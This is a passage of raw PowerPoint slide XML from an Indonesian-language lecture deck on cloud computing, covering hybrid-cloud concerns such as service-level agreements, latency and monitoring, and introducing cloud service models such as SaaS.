              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pertimbangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penetapan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penegakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perjanjian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (SLA). SLA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>resmi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menguraikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ekspektasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kinerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketersediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dukungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Menjamin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diharapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tantangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berhadapan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>integrasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kekhawatiran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lain yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkait</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud hybrid </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>potensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peningkatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>latensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> volume transfer data yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lingkungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan cloud yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berdampak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kinerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemantauan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lingkungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> hybrid </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kompleks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>persyaratan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keahlian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>khusus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{CB01ABFF-EA85-4275-9F47-ADE2D33AB565}" type="slidenum">
              <a:rPr lang="en-ID" smtClean="0"/>
              <a:t>130</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="427461461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Model </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Cloud</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Selain model </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepemilikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>privat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, hybrid, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komunitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>), model </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibedakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berdasarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerumitan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jumlah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pra-konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Model-model </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesuatu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>apa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pun </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>XaaS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>). Tiga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>implementasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang paling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan platform.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Lunak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Layanan</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (SaaS) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> model </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Daripada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membeli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lisensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sejumlah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kursi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengakses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dihosting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemasok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengaturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bayar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesuai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penggunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sewa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesuai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permintaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> virtual </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengembang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
